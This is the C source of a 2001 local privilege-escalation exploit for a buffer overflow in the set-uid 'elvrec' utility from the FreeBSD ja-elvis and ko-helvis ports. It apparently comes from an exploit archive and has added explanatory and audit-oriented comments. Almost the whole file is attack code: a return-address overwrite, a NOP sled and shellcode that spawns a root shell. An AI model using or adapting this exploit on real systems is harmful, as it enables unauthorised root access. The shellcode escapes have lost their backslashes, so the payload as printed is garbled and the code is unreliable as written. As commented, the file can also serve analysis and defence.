/*
* ja-elvis & ko-helvis - FreeBSD 3.5.1 & 4.2 ports package local root exploit
*
* vulnerable: versions prior to ja-elvis-1.8.4_1 and ko-helvis-1.8h2_1
*
* The two packages above ship a file-recovery utility, 'elvrec', which is
* installed set-uid root (mode 4755) by default. The utility contains a buffer
* overflow that yields root privileges:
*
* Usage: ./elvwreck <offset> <alignment>
*
* [email protected] // www.synnergy.net
* 28 Feb 2001.
*
*/
#include <stdio.h>
#include <stdlib.h>
#define PROG "/usr/local/bin/elvrec"
#define VULN 608
#define BSIZE 1024
#define NOP 0x90
#define ESP 0xbfbff92c // FreeBSD 4.2
#define OFFSET 0
#define EATME 1 // byte alignment
/*
 * Payload that main() copies in after the NOP sled. As rendered on this page
 * the escape sequences have lost their backslashes, so this literal is not the
 * original byte string; the only readable parts are the "/bin/sh" and "-c"
 * strings at the end, which are also the obvious markers to look for when
 * auditing arguments passed to a set-uid binary.
 */
char shellcode[]=
"xebx37x5ex31xc0x88x46xfax89x46xf5x89x36x89x76"
"x04x89x76x08x83x06x10x83x46x04x18x83x46x08x1b"
"x89x46x0cx88x46x17x88x46x1ax88x46x1dx50x56xff"
"x36xb0x3bx50x90x9ax01x01x01x01x07x07xe8xc4xff"
"xffxffx02x02x02x02x02x02x02x02x02x02x02x02x02"
"x02x02x02/bin/sh.-c.sh";
/*
 * Entry point. Builds one oversized argument for elvrec (PROG) and exec()s it:
 * bytes [align, VULN) are filled with the chosen return address, the bytes up
 * to BSIZE - strlen(shellcode) - 100 with NOP, then the payload is copied in.
 * The return address is ESP (the FreeBSD 4.2 value from the #define) plus an
 * optional offset from argv[1]; argv[2] sets the byte alignment of the
 * address run.
 *
 * On the target side the exposure is the set-uid bit on elvrec; the package
 * versions named in the file header carry the fix. Because the whole attack is
 * a single long argv[1] handed to a set-uid binary, an argument of that size
 * and content is the thing to look for in audit or argv logging.
 */
int main(int argc, char *argv[]) {
char buffer[BSIZE];
long address=ESP;
int i, offset, align;
/* argc > 1 only guarantees argv[1]; with exactly one argument argv[2] is NULL
 * and atoi(NULL) is undefined behaviour. */
if(argc > 1) { offset = atoi(argv[1]); align = atoi(argv[2]); }
else { offset = OFFSET; align = EATME; }
address += offset;
/* The stray "n" glyphs are "\n" escapes that lost their backslash in this copy.
 * %#x is given a long (address), a format/argument mismatch on LP64 targets. */
fprintf(stderr, "n* using ret %#x -> align %d -> offset %dnn", address, align, offset);
/* Return-address run: a long is stored through a char* cast every 4 bytes. The
 * stores are misaligned for align != 0 and violate strict aliasing (UB), and
 * the stride is 4 regardless of sizeof(long). */
for(i=align; i<VULN; i+=4){ *(long *)&buffer[i] = address; }
/* NOP sled. i is int and strlen() returns size_t, so the bound is compared
 * as unsigned. */
for(i=VULN; i<(BSIZE - strlen(shellcode) - 100); i++){ buffer[i] = NOP; }
/* Payload goes directly after the sled; strlen() stops at the first NUL. */
memcpy(buffer+i, shellcode, strlen(shellcode));
/* Index BSIZE is one past the end of buffer[BSIZE]: an out-of-bounds write
 * (UB) in the exploit's own stack frame. */
buffer[BSIZE] = ' ';
/* execlp() only returns on failure. The variadic list is terminated with a
 * plain 0 rather than (char *)NULL, which is not portable to LP64 ABIs. */
if(execlp(PROG, "elvrec", buffer, 0)) {
fprintf(stderr, "Unable to execute %snn", PROG);
exit(1);
}
}
// milw0rm.com [2001-03-03]